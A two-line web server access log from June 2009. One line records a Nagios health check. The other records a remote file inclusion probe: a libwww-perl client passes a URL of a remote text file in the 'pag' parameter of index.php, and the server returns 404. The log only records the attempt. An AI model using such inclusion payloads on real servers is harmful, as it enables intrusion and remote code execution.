110.45.145.92 - - [10/Jun/2009:05:41:36 -0400] "GET /logs/index.php?pag=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
209.59.12.99 - - [10/Jun/2009:05:41:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
